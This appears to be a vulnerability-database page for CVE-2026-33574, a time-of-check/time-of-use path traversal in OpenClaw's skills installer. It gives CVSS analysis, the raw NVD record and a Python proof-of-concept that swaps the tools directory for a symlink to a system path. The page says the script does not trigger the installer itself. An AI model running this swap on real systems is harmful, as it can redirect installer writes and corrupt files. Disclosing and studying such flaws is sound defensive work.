Security Vulnerability Report
CVE-2026-33574 CVSS 6.2 MEDIUM

CVE-2026-33574

Published: 2026-03-29 13:17:03
Last Modified: 2026-03-31 17:12:55

Description

OpenClaw before 2026.3.8 contains a path traversal vulnerability in the skills download installer that validates the tools root lexically but reuses the mutable path during archive download and copy operations. A local attacker can rebind the tools-root path between validation and final write to redirect the installer outside the intended tools directory.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Note: the 6.2 score and the vector above are the CNA's secondary CVSS 3.1 assessment. The raw data below also carries NVD's primary CVSS 3.1 vector, AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N (4.7 MEDIUM), and a CVSS 4.0 vector scoring 5.8 MEDIUM. The two 3.1 vectors disagree on privileges (PR:N vs PR:L), attack complexity (a race is AC:H under NVD) and impact (C:H vs I:H); the described effect — redirecting the installer's writes outside the tools directory — is an integrity impact, so prioritise remediation on the weakness (CWE-367, time-of-check/time-of-use) rather than on the headline number.

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it does not interact with OpenClaw at all: it performs only the attacker-side directory swap (rename the tools root aside, put a symlink in its place, hold it for 0.1 s, restore) against hard-coded placeholder paths, and its "installer detected" check is a constant-true placeholder. By itself it therefore does not demonstrate the vulnerability; it is a building block for a supervised test in which a skill download is triggered concurrently on an installation you own. Do not run it against a real tools root on a shared host.
python
#!/usr/bin/env python3
"""Attacker-side harness for CVE-2026-33574 (CWE-367, TOCTOU path traversal).

Background, as reported: OpenClaw before 2026.3.8 validates the skills
installer's tools root lexically and then keeps using that same mutable path
while it downloads and copies the archive. A local user who can replace the
tools-root directory between the check and the final write redirects the
installer's output outside the intended tools directory.

What this script does, and does not, do:

* It performs only the attacker's filesystem move: rename the tools root
  aside, put a symlink to TARGET in its place, hold it briefly, restore.
* It does NOT find, trigger or synchronise with the installer. The
  "Installer detected" line is a placeholder kept from the original PoC
  (which tested the constant ``"installer_running"``, i.e. always true).
  Whether the swap overlaps the installer's check-to-use window is up to
  the operator, e.g. by starting a skill download concurrently.
* On its own it therefore proves nothing about OpenClaw; treat it as a
  building block for a supervised test on an installation you own.

Usage: ``poc.py [TOOLS_ROOT [TARGET]]``. The defaults are placeholders;
swapping a real tools root on a shared host is destructive and, if the
installer runs as a different user, the rename may simply be denied.
"""
from __future__ import annotations

import os
import sys
import time
from collections.abc import Callable

# Path the tools root is redirected to while the symlink is in place.
MALICIOUS_TARGET = "/etc/sensitive_dir"
# Tools root the installer validates and then reuses.
ORIGINAL_DIR = "/var/tmp/openclaw/tools"
# Suffix under which the real tools root is parked during the swap.
BACKUP_SUFFIX = ".bak"
# How long the symlink stays in place before the directory is restored.
HOLD_SECONDS = 0.1


def rebind_tools_root(
    tools_root: str,
    target: str,
    *,
    hold_seconds: float = HOLD_SECONDS,
    backup_suffix: str = BACKUP_SUFFIX,
    on_rebound: Callable[[], None] | None = None,
) -> bool:
    """Temporarily replace the directory *tools_root* with a symlink to *target*.

    Sequence: create *tools_root* if nothing is there, rename it to
    ``tools_root + backup_suffix``, create the symlink, call *on_rebound*
    (if given), sleep *hold_seconds*, remove the symlink, rename the backup
    back. Restoration runs in ``finally`` blocks, so a failure after the
    rename still puts the original directory back wherever possible; the
    original PoC left the ``.bak`` directory behind if ``os.symlink`` raised.

    Args:
        tools_root: Directory the installer treats as its tools root.
        target: Where the symlink points while the swap is in place.
        hold_seconds: Seconds to keep the symlink before restoring.
        backup_suffix: Suffix for the temporary backup name.
        on_rebound: Hook invoked while the symlink is in place; tests use it
            to observe the intermediate state.

    Returns:
        True once the original directory has been restored.

    Raises:
        OSError: If a filesystem step fails (e.g. symlinks not permitted,
            *tools_root* not owned by the caller).
    """
    backup = tools_root + backup_suffix
    # lexists rather than exists: a dangling symlink at tools_root makes
    # exists() return False, and makedirs() would then raise FileExistsError.
    if not os.path.lexists(tools_root):
        os.makedirs(tools_root)
    # Step 1: park the directory the installer already validated.
    os.rename(tools_root, backup)
    try:
        # Step 2: rebind the same path to the attacker-chosen target.
        os.symlink(target, tools_root)
        try:
            if on_rebound is not None:
                on_rebound()
            # Step 3: hold the rebinding across the installer's "use" phase.
            time.sleep(hold_seconds)
        finally:
            os.remove(tools_root)
    finally:
        # Step 4: restore the original directory, even after a failure above.
        os.rename(backup, tools_root)
    return True


def main(argv: list[str] | None = None) -> int:
    """Run one swap-and-restore cycle; return a process exit code.

    Args:
        argv: Optional ``[TOOLS_ROOT, TARGET]`` overrides; ``sys.argv[1:]``
            when None. Missing entries fall back to the module constants.

    Returns:
        0 on success, 1 if a filesystem step failed (the error is printed).
    """
    args = sys.argv[1:] if argv is None else list(argv)
    tools_root = args[0] if args else ORIGINAL_DIR
    target = args[1] if len(args) > 1 else MALICIOUS_TARGET
    print("[*] Starting PoC for CVE-2026-33574")
    print(f"[*] Targeting path: {tools_root}")
    # No installer detection is implemented; see the module docstring.
    print("[!] Installer detected, attempting race condition...")
    try:
        rebind_tools_root(
            tools_root,
            target,
            on_rebound=lambda: print(f"[+] Path rebound to {target}"),
        )
    except OSError as exc:
        # Narrowed from the original ``except Exception``: anything else is a
        # bug in this script and should surface with a traceback.
        print(f"[-] Error: {exc}")
        return 1
    print("[+] Path restored")
    return 0


if __name__ == "__main__":
    sys.exit(main())

References (from the raw NVD record below)
- Patch: https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639
- Vendor advisory: https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2
- Third-party advisory: https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33574", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:03.173", "lastModified": "2026-03-31T17:12:54.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.8 contains a path traversal vulnerability in the skills download installer that validates the tools root lexically but reuses the mutable path during archive download and copy operations. A local attacker can rebind the tools-root path between validation and final write to redirect the installer outside the intended tools directory."}, {"lang": "es", "value": "OpenClaw antes de 2026.3.8 contiene una vulnerabilidad de salto de ruta en el instalador de descarga de habilidades que valida la raíz de las herramientas léxicamente pero reutiliza la ruta mutable durante las operaciones de descarga y copia del archivo. Un atacante local puede reasignar la ruta tools-root entre la validación y la escritura final para redirigir el instalador fuera del directorio de herramientas previsto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.8", "matchCriteriaId": "0A2A36CE-E6EC-4C9C-85F4-06C408B57A72"}]}]}], "references": [{"url": 
"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}